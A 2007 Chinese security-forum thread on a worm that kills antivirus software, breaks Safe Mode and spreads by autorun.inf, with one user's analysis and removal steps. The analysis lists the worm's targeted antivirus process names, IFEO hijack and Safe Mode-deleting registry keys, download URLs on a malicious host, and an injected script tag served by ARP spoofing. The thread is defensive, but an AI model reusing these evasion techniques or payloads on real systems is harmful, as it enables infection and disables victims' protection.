肖申克

级别: DOS 7.X

作者资料
发送短消息
加为好友

UID: 38850
精华: 0
发帖: 256
威望: 1 点
星星铁: 316 块
贡献值: 0 点
在线时间: 29(小时)
注册时间: 2007-02-07
最后登录: 2008-09-04

楼主发表于: 2007-05-30 19:46

只看楼主 | 小中大

解决一种屏蔽杀毒软件\反病毒工具\破坏安全模式的新型病毒专题

管理提醒：本帖被肖申克执行置顶操作(2007-05-30)

[h1][/h1]最近出现了一种新型病毒
表现特征:关闭杀毒软件,限制安装使用杀毒软件,限制以病毒为关键字的搜索,限制访问反病毒网站,屏蔽国内流行反病毒工具
hijackthis sreng2 IceSword 等无法进入安全模式在每个分区复制病毒备份感染U盘
如果你遇到这个问题请访问一下链接
强人杀毒(屏蔽杀毒软件)
http://avfbbs.80port.net/read-htm-tid-16762.html
xiaobin08 网友提供

我解决一个超强病毒{AVSAFEBOOT KILLER(TROJ)}
http://avfbbs.80port.net/read-htm-tid-16767.html
xiaobin08 网友提供

所有的杀毒软件都不能用,这个病毒真厉害.
http://www.11zhuce.com/seo/virus.html
okzhuce 网友提供

如果您有更有效办法欢迎提供!
我们一起讨论

[ 此贴被肖申克在2007-05-30 19:56重新编辑 ]

说道做到很难,但只有偏执狂才更容易成功!

顶端

肖申克

级别: DOS 7.X

作者资料
发送短消息
加为好友

UID: 38850
精华: 0
发帖: 256
威望: 1 点
星星铁: 316 块
贡献值: 0 点
在线时间: 29(小时)
注册时间: 2007-02-07
最后登录: 2008-09-04

1楼发表于: 2007-05-30 20:20

只看该作者 | 小中大

如果不懂得解决这个病毒请重装系统后
先别打开我的电脑里的除C盘以为的分区
可先打开我的电脑--地址栏输入D:\ 进入其它分区采用同样方法工具-文件夹选项-查看-去掉"隐藏系统文件",-点显示隐藏文件
刷新就可以看到病毒文件autorun.inf和随机产生的*.exe
如:00E931B4.exe
删掉就可以!

说道做到很难,但只有偏执狂才更容易成功!

顶端

1983081120

级别: AVF初窥者

作者资料
发送短消息
加为好友

UID: 43868
精华: 0
发帖: 2
威望: 1 点
星星铁: 2 块
贡献值: 0 点
在线时间: 0(小时)
注册时间: 2007-06-01
最后登录: 2007-06-01

2楼发表于: 2007-06-01 12:14

只看该作者 | 小中大

这个根本不行，删了系统还会自动复制，根本不管用，还是上面的强人杀毒(屏蔽杀毒软件)帅，那才是解决问题的高手。。。。支持~~~！！！

顶端

肖申克

级别: DOS 7.X

作者资料
发送短消息
加为好友

UID: 38850
精华: 0
发帖: 256
威望: 1 点
星星铁: 316 块
贡献值: 0 点
在线时间: 29(小时)
注册时间: 2007-02-07
最后登录: 2008-09-04

3楼发表于: 2007-06-01 18:42

只看该作者 | 小中大

谢谢支持!

说道做到很难,但只有偏执狂才更容易成功!

顶端

stickm4

级别: DOS 3.X

作者资料
发送短消息
加为好友

UID: 14942
精华: 1
发帖: 146
威望: 13 点
星星铁: 104 块
贡献值: 0 点
在线时间: 16(小时)
注册时间: 2006-10-08
最后登录: 2007-06-04

4楼发表于: 2007-06-03 11:13

只看该作者 | 小中大

研究中，请给原样本

顶端

241602110

级别: AVF初窥者

作者资料
发送短消息
加为好友

UID: 44299
精华: 0
发帖: 1
威望: 1 点
星星铁: 1 块
贡献值: 0 点
在线时间: 0(小时)
注册时间: 2007-06-11
最后登录: 2007-06-19

5楼发表于: 2007-06-13 13:49

只看该作者 | 小中大

最近这个病毒真的很猛....
解决的方法越来越难!

顶端

肖申克

级别: DOS 7.X

作者资料
发送短消息
加为好友

UID: 38850
精华: 0
发帖: 256
威望: 1 点
星星铁: 316 块
贡献值: 0 点
在线时间: 29(小时)
注册时间: 2007-02-07
最后登录: 2008-09-04

6楼发表于: 2007-06-13 14:16

只看该作者 | 小中大

昨天搞了一个弄到一半
按照论坛上的文章弄
到了重起阶段却重起不了

说道做到很难,但只有偏执狂才更容易成功!

顶端

wstcxtchina

级别: AVF初窥者

作者资料
发送短消息
加为好友

UID: 7683
精华: 0
发帖: 4
威望: 21 点
星星铁: 354 块
贡献值: 0 点
在线时间: 2(小时)
注册时间: 2006-08-17
最后登录: 2008-10-02

7楼发表于: 2007-06-13 14:59

只看该作者 | 小中大

最近发现很多人出现了打不开shadu软件反病毒工具甚至带有病毒字样的窗口今天就接到了这样的一个样本先前
这是一个可以说结合了几乎所有病毒的特征的病毒除了感染文件之外可以说是比熊猫有过之而无不及！
病毒特征：
1.破坏安全模式
2.结束常见杀毒软件以及反病毒工具进程
3.监控窗口
4.关闭自动更新以及Windows安全中心
5.屏蔽显示隐藏文件
6.下载木马
7.IFEO映像劫持
8.GHOST文件引导破坏
9.各盘符均有引导启动关联文件，即便你重装系统盘也照样发作

分析报告
File: 1201AEC1.exe
Size: 36435 bytes
MD5: 23D80E8E5C2B7EB19E006E80C9BD4BFB
SHA1: E760703C8776C652B424FA62AF945434FB786BE5
CRC32: 27CA1195
加壳方式：UPX
病毒运行后
在C:\Program Files\Common Files\Microsoft Shared\MSInfo\下面释放一个同样由8个数字和字母组成的组合的文

件名的dll 和一个同名的dat 文件
我这里是C:\Program Files\Common Files\Microsoft Shared\MSInfo\41115BDD.dll
这个随机的数字应该与机器码有关
该dll插入Explorer进程 Timplatform以及ctfmon进程

监视并关闭以下进程以及窗口
AntiVirus
TrojanFirewall
Kaspersky
JiangMin
KV200
kxp
Rising
RAV
RFW
KAV200
KAV6
McAfe
Network Associates
TrustPort
NortonSymantec
SYMANT~1
Norton SystemWorks
ESET
Grisoft
F-Pro
Alwil Software
ALWILS~1
F-Secure
ArcaBit
Softwin
ClamWin
DrWe
Fortineanda Software
Vba3
Trend Micro
QUICKH~1
TRENDM~1
Quick Heal
eSafewido
Prevx1
ers
avg
Ikarus
SophoSunbeltPC-cilli
ZoneAlar
Agnitum
WinAntiVirus
AhnLab
Normasurfsecret
Bullguard\Blac
360safe
SkyNet
Micropoint
Iparmor
ftc
mmjk2007
Antiy Labs
LinDirMicro Lab
Filseclab
ast
System Safety Monitor
ProcessGuard
FengYun
Lavasoft
NOD3
mmsk
The Cleaner
Defendio
kis6Beheadsreng
IceSword
HijackThis
killbox
procexp
Magicset
EQSysSecureProSecurity
Yahoo!
Google
baidu
P4P
Sogou PXP
ardsys
超级兔子木马
KSysFiltsys
KSysCallsys
AVK
K7
Zondex
blcorp
Tiny Firewall Pro
Jetico
HAURI
CA
kmx
PCClear_Plus
Novatix
Ashampoo
WinPatrol
Spy Cleaner Gold
CounterSpy
EagleEyeOS
Webroot
BufferZ
avp
AgentSvr
CCenter
Rav
RavMonD
RavStub
RavTask
rfwcfg
rfwsrv
RsAgent
Rsaupd
runiep
SmartUp
FileDsty
RegClean
360tray
360Safe
360rpt
kabaload
safelive
Ras
KASMain
KASTask
KAV32
KAVDX
KAVStart
KISLnchr
KMailMon
KMFilter
KPFW32
KPFW32X
KPFWSvc
KWatch9x
KWatch
KWatchX
TrojanDetector
UpLive.EXE
KVSrvXP
KvDetect
KRegEx
kvol
kvolself
kvupload
kvwsc
UIHost
IceSword
iparmo
mmsk
adam
MagicSet
PFWLiveUpdate
SREng
WoptiClean
scan32
hcfg32
mcconsol
HijackThis
mmqczj
Trojanwall
FTCleanerShell
loaddll
rfwProxy
KsLoader
KvfwMcl
autoruns
AppSvc32
ccSvcHst
isPwdSvc
symlcsvcnod32kui
avgrssvc
RfwMain
KAVPFW
Iparmor
nod32krn
PFW
RavMon
KAVSetup
NAVSetup
SysSafe
QHSET
zxsweep.
AvMonitor
UmxCfg
UmxFwHlp
UmxPol
UmxAgent
UmxAttachment
KPFW32
KPFW32X
KvXP_1
KVMonXP_1
KvReport
KVScan
KVStub
KvXP
KVMonXP
KVCenter
TrojDie
avp.com.
krepair.COM
KaScrScn.SCR
Trojan
Virus
kaspersky
jiangmin
rising
ikaka
duba
kingsoft
360safe
木马
木马
病毒
shadu
shadu
查毒
防毒
反病毒
专杀
专杀
卡巴斯基
江民
瑞星
卡卡社区
金山毒霸
毒霸
金山社区
3 6 0 安全
恶意软件
流氓软件
举报
报警
杀软
杀软
防骇

在C:\WINDOWS\Help\下面生成一个同样由8个数字和字母组成的组合的文件名的chm文件
在C:\WINDOWS\下面生成一个同样由8个数字和字母组成的组合的文件名的hlp文件
删除C:\WINDOWS\system32\verclsid.exe
将其重命名为verclsid.exe.bak
释放41115BDD.exe（随机8位）和autorun.inf到除系统分区外的其他分区

注册表相关操作
删除
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
破坏安全模式

修改

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue值

为0x00000000
HKU\S-1-5-21-1085031214-1078145449-839522115-500

\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden为0x00000002
HKU\S-1-5-21-1085031214-1078145449-839522115-500

\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden为0x00000001
屏蔽显示隐藏文件

修改常见杀毒软件服务的start键值为0x00000004
如HKLM\SYSTEM\ControlSet001\Services\RfwService\Start: 0x00000004

修改HKLM\SYSTEM\CurrentControlSet\Services\wuauserv\Start
和HKLM\SYSTEM\CurrentControlSet\Services\wscsvc\start键值为0x00000004
关闭自动更新

添加IFEO映像劫持项( 我的意见是用Autoruns删除映像劫持)
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adam.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AgentSvr.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AppSvc32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrssvc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AvMonitor.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccSvcHst.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FileDsty.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FTCleanerShell.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iparmo.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Iparmor.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\isPwdSvc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kabaload.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KaScrScn.SCR
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASMain.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASTask.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAV32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVDX.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVPFW.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVSetup.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVStart.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KISLnchr.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMailMon.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMFilter.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32X.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFWSvc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRegEx.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\krepair.COM
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KsLoader.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVCenter.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvDetect.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvfwMcl.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP_1.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvol.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvolself.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvReport.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVScan.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVSrvXP.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVStub.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvupload.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvwsc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP_1.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch9x.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatchX.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\loaddll.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MagicSet.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcconsol.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmqczj.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmsk.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVSetup.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32krn.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32kui.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFW.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWLiveUpdate.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHSET.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMonD.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavStub.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavTask.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegClean.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwcfg.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RfwMain.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwProxy.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwsrv.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RsAgent.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rsaupd.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiep.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\safelive.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scan32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\shcfg32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SmartUp.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SREng.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\symlcsvc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SysSafe.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojanDetector.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Trojanwall.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojDie.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UIHost.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAgent.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAttachment.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxCfg.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxFwHlp.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxPol.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UpLive.EXE.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WoptiClean.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zxsweep.exe

被劫持到C:\Program Files\Common Files\Microsoft Shared\MSInfo\下面的那个dat文件

下载dl1.exe到临时文件夹
首先下载http://google.xxxx38.org/update/down.txt看病毒是否需要更新

然后分别下载http://google.xxxx38.org/update/wow.exe
http://google.xxxx38.org/update/mh.exe
http://google.xxxx38.org/update/wm.exe
http://google.xxxx38.org/update/my.exe
http://google.xxxx38.org/update/wl.exe
http://google.xxxx38.org/update/zt.exe
http://google.xxxx38.org/update/jh.exe
http://google.xxxx38.org/update/tl.exe
http://google.xxxx38.org/update/1.exe
http://google.xxxx38.org/update/2.exe 到program files 文件夹并把他们命名为ycnt1.exe~ycnt10.exe

具体每个文件的生成物就不一一列举了
不过值得一提的是ycnt9.exe这个木马
他生成C:\WINDOWS\system32\win1ogo.exe
并且该木马试图向局域网内所有用户的80端口每隔5000ms进行arp欺骗
插入<script language=javascript src=http://google.171738.org/ad2.js></script>代码
也就是局域网内所有用户在打开网页时都会被插入这段代码

所有木马文件植入完毕后生成物如下
C:\WINDOWS\system32\drivers\npf.sys
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\msdebug.dll
C:\WINDOWS\system32\nwiztlbu.exe
C:\WINDOWS\system32\Packet.dll
C:\WINDOWS\system32\RemoteDbg.dll
C:\WINDOWS\system32\testdll.dll
C:\WINDOWS\system32\WanPacket.dll
C:\WINDOWS\system32\win1ogo.exe
C:\WINDOWS\system32\windds32.dll
C:\WINDOWS\system32\winpcap.exe
C:\WINDOWS\system32\wpcap.dll
C:\WINDOWS\system32\xpdhcp.dll
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\testexe.exe
C:\Program Files\Common Files\cssrs.exe
sreng日志反映如下（在处理一些东西后扫描的这里提前列出）

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<testrun><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\testexe.exe> []
<Kvsc><C:\WINDOWS\Kvsc3.exe> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
<{15BD4111-4111-5BDD-115B-111BD1115BDD}><C:\Program Files\Common Files\Microsoft

Shared\MSINFO\41115BDD.dll> []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
<Userinit><C:\WINDOWS\system32\userinit.exe,C:\Program Files\Common Files\cssrs.exe,> [N/A]
[PID: 1400][C:\WINDOWS\Explorer.EXE] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-

2158)]
[C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\testdll.dll] [N/A, ]
[C:\WINDOWS\system32\Kvsc3.dll] [N/A, ]

解决办法如下：

1.确定那个8位随机数的dll的名称
这里我们选用winrar确定那个dll的名称
方法是：打开winrar.exe
工具查看
在上面的地址栏中进入c:\program files\common files\microsoft shared\msinfo目录
我这台被感染的电脑的文件名为41115bdd.dll

2.使用强制删除工具删除那个dll文件
这里我们选用Xdelbox1.2这个软件

XDelBox1.2（Dos级别灭杀工具）：
1、dos级文件删除方式，打造病毒清除新模式
2、无须进入安全模式，即可删除所有病毒文件
3、支持一次重启批量删除多个文件
4、复制路径的删除添加方式更适用于网络求助(支持拖曳)
注意：删除时复制所有要删除文件的路径，在待删除文件列表里点击右键选择从剪贴板导入。导入后在要删除文件上点击右键，选择立刻重启删除，电脑会重启进入DOS界面进行删除操作，删除完成后会自动重启进入你安装的操作系统。操作前注意保存电脑中正在打开的文档。有关XDelBox的详细说明请看xdelbox1.2目录下help.chm

重起机器后
3.恢复被映像劫持的软件
这里我们使用autoruns这个软件由于这个软件也被映像劫持了所以我们随便把他改个名字
打开这个软件后找到Image hijack (映像劫持）
删除除了Your Image File Name Here without a pathSymbolic Debugger for Windows 2000Microsoft Corporationc:\windows\system32\ntsd.exe
以外的所有项目

4.此时我们就可以打开sreng了呵呵
打开sreng
系统修复高级修复点击修复安全模式在弹出的对话框中点击是

5.恢复显示隐藏文件

把下面的代码拷入记事本中然后另存为1.reg文件
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL

]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"

双击1.reg把这个注册表项导入

好了此时病毒对于我们的所有限制已经解除了

6.清除其下载的木马了
重起机器进入安全模式
双击我的电脑，工具，文件夹选项，查看，单击选取"显示隐藏文件或文件夹"

清除"隐藏受保护的操作系统文件

用WINRAR打开然后查看以下路径，将发现的名字都删（里面是病毒下载下来的木马）
C:\Documents and Settings\Administrator\Local Settings\Temp\testexe.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\testexe.dll
C:\Documents and Settings\Administrator\Local Settings\Temp\dl1.exe
C:\Program Files\Common Files\Microsoft Shared\MSInfo\41115BDD.dat（随机8位数字字母组合）
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\testexe.exe
C:\WINDOWS\Help\41115BDD.chm（随机8位数字字母组合）
C:\WINDOWS\system32\DirectX\DirectX.ini
C:\WINDOWS\system32\drivers\npf.sys
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\msdebug.dll
C:\WINDOWS\system32\nwiztlbu.exe
C:\WINDOWS\system32\Packet.dll
C:\WINDOWS\system32\RemoteDbg.dll
C:\WINDOWS\system32\testdll.dll
C:\WINDOWS\system32\WanPacket.dll
C:\WINDOWS\system32\win1ogo.exe
C:\WINDOWS\system32\windds32.dll
C:\WINDOWS\system32\winpcap.exe
C:\WINDOWS\system32\wpcap.dll
C:\WINDOWS\system32\xpdhcp.dll
C:\WINDOWS\41115BDD.hlp（随机8位数字字母组合）
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\testexe.exe
C:\Program Files\Common Files\cssrs.exe
C:\Program files\ycnt1.exe~ycnt10.exe(如果有的话）

最后别忘了
7.还是用winrar 删除各个分区下面的autorun.inf和 41115BDD.exe（随机8位数字字母组合）
一定不要双击最好的方法是用winrar看
8.装杀毒软件保护好你的电脑
到此为止，病毒已经完全清除。。。

附带本次所有软件（连接绝不丢失）：
xdelbox1.2
http://www.hltsoft.cn/download/soft/safetools1/xdelbox1.2.RAR

SREng
http://www.hltsoft.cn/download/soft/safetools1/SREng.rar

Autoruns
http://www.hltsoft.cn/download/soft/safetools1/Autoruns861-YYZ.rar

顶端